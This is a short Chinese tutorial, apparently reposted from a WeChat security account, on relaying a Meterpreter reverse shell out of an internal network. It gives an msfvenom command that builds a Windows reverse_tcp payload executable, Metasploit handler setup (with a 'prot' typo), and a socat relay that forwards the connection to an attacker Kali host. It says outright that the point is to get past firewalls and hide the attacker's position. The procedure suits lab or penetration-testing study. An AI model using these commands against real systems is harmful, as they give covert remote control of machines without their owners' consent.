内网转发连接外网meterpreter
在多个或者两个不网络中使用正向连接远程的攻击载荷,但是有时会有限制,如防火墙干扰拦截,同时也会暴露我们在网络中的位置。让攻击载荷反向连接 meterpreter 同时也能隐藏攻击者在网络的位置。
10.10.10.132 连接上 10.10.10.147 再通过 192.168.0.156连接上 kali 192.168.0.119
如图
可以使用socat重定向攻击载荷 连接上meterpreter。
1 生成攻击载荷
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.147 lport=12345 -f exe >~/Desktop/lab/s.exe
metasploit 执行
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set prot 12345
prot => 12345
exploit
2 执行socat命令
在192.168.0.156机子上执行
socat TCP4-LISTEN:12345,reuseaddr,fork TCP4:192.168.0.119:4444
3.在内网目标上执行生成的攻击载荷。
温馨提示
如果你喜欢本文,请分享到朋友圈,想要获得更多信息,请关注我。
原文始发于微信公众号(moonsec):内网转发连接外网meterpreter
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论